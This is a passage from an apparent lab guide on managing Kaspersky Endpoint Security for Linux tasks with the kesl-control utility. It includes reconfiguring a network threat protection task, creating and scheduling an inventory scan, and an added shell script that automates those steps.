kesl-control --set-settings 17 ActionOnDetect=notify BlockDurationMinutes=30 UseExcludeIPs=yes ExcludeIPs.item_0000=10.28.0.31
Output the current settings of the Network Threat Protection task
kesl-control --get-settings 17
Run the Network Threat Protection task
kesl-control --start-task 17

Task C: Create a new task using the terminal

Create an Inventory task and modify its settings using the terminal. Run the task and check the result.

The task is performed on the workstation machine.

By default, Kaspersky Security Center prohibits users from creating tasks using kesl-control. Let’s allow task
creation

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & Profiles
Open Group A policy
Switch to the Application settings tab
In the Local Tasks section, open Task management
Select the checkbox Allow users to view and manage local tasks
Click OK to save the settings
Click Save
Open the terminal and connect to servera
ssh servera
Enter the password Ka5per5Ky

Create a new Inventory task
kesl-control --create-task Inventory --type InventoryScan

Your task ID may differ. We’ll use it to manage the task in our commands; use the number that you have
received when creating the task

Display the list of tasks; you will see the created task on the list
kesl-control --get-task-list
Output the current task settings
kesl-control --get-settings 166
Add the /bin area to the inventory settings. To do so, enter the following command:
kesl-control --set-settings 166 ScanScope.item_0001.UseScanArea=yes ScanScope.item_0001.Path=/bin
Output the current settings of the Inventory task
kesl-control --get-settings 166
View the inventory task schedule
kesl-control --get-schedule 166

The task start schedule is set to manual mode. Add automatic start every Saturday
kesl-control --set-schedule 166 RuleType=weekly RunMissedStartRules=yes StartTime='13:00:00;Sat' RandomInterval=60
View the inventory task schedule
kesl-control --get-schedule 166
Start the inventory manually
kesl-control --start-task 166
Check the task state
kesl-control --get-task-state 166
Display the list of executable files detected by the Inventory task on the screen
kesl-control --get-app-list
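The Task C procedure above (and the inventory scan from Lab 6, done from the terminal instead of the web console) is exactly what the scenario's "scripts and the kesl-control utility" would automate in the isolated segment. The script below is an added example written for this guide; it is not a script from the lab or from Kaspersky. It assumes that kesl-control --create-task prints the new task's numeric ID somewhere in its output (the first integer found is taken as the ID), that --get-task-state reports a running task with the word Started, and that scan paths contain no whitespace; adjust the helper functions if your build's output differs.

```shell
#!/bin/sh
# Added example for Lab 8 Task C (not from the lab guide or Kaspersky): create an
# Inventory task with kesl-control, add scan areas, schedule it, run it, list results.
# Assumptions: --create-task prints the task ID as the first integer in its output;
# --get-task-state contains "Started" while the task runs; paths have no whitespace.
set -eu

KESL=${KESL:-kesl-control}   # override with KESL=/path/to/kesl-control if needed

# Return the first integer found in the text passed as $1 (the --create-task output).
extract_task_id() {
    printf '%s\n' "$1" | grep -oE '[0-9]+' | head -n 1
}

# Build the ScanScope key=value list for the paths given after $1, numbering items
# from index $1 (the lab uses item_0001 for /bin because item_0000 holds /usr/bin).
scan_scope_args() {
    i=$1; shift
    out=''
    for path in "$@"; do
        idx=$(printf '%04d' "$i")
        out="$out${out:+ }ScanScope.item_$idx.UseScanArea=yes ScanScope.item_$idx.Path=$path"
        i=$((i + 1))
    done
    printf '%s' "$out"
}

# Weekly schedule as in the lab: run at the given day/time, catch up missed starts,
# spread the start over a 60 minute random interval.
schedule_args() {
    printf '%s' "RuleType=weekly RunMissedStartRules=yes StartTime=$1 RandomInterval=60"
}

main() {
    [ $# -gt 0 ] || set -- /bin     # default to the path the lab adds

    # Create the task and pull its ID out of the utility's output.
    created=$("$KESL" --create-task Inventory --type InventoryScan)
    id=$(extract_task_id "$created")
    [ -n "$id" ] || { echo "could not parse task ID from: $created" >&2; exit 1; }

    # Word splitting on the generated key=value lists is intended here.
    "$KESL" --set-settings "$id" $(scan_scope_args 1 "$@")
    "$KESL" --set-schedule "$id" $(schedule_args '13:00:00;Sat')
    "$KESL" --start-task "$id"

    # Wait for the scan to finish, then show what it found.
    while "$KESL" --get-task-state "$id" | grep -qi started; do sleep 5; done
    "$KESL" --get-app-list
}

# Only drive kesl-control when it is actually installed on this host.
if command -v "$KESL" >/dev/null 2>&1; then
    main "$@"
else
    echo "$KESL not found: helper functions defined, nothing executed" >&2
fi
```

Run it as root on the managed host, for example sh kesl_inventory.sh /bin /opt/bin; with no arguments it adds /bin, as in the lab. The StartTime value needs no extra quoting when it comes from a variable, because the shell does not re-parse the ";" inside an expansion as a command separator. The scan_scope_args and schedule_args helpers only build the key=value lists the lab types by hand, so the same pattern serves the Task B call kesl-control --set-settings 17 ... .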

Conclusion

You have reconfigured an existing task and created a new one from scratch remotely. You can use this
functionality to automate Kaspersky Endpoint Security for Linux tasks where Kaspersky Security Center cannot be
used.
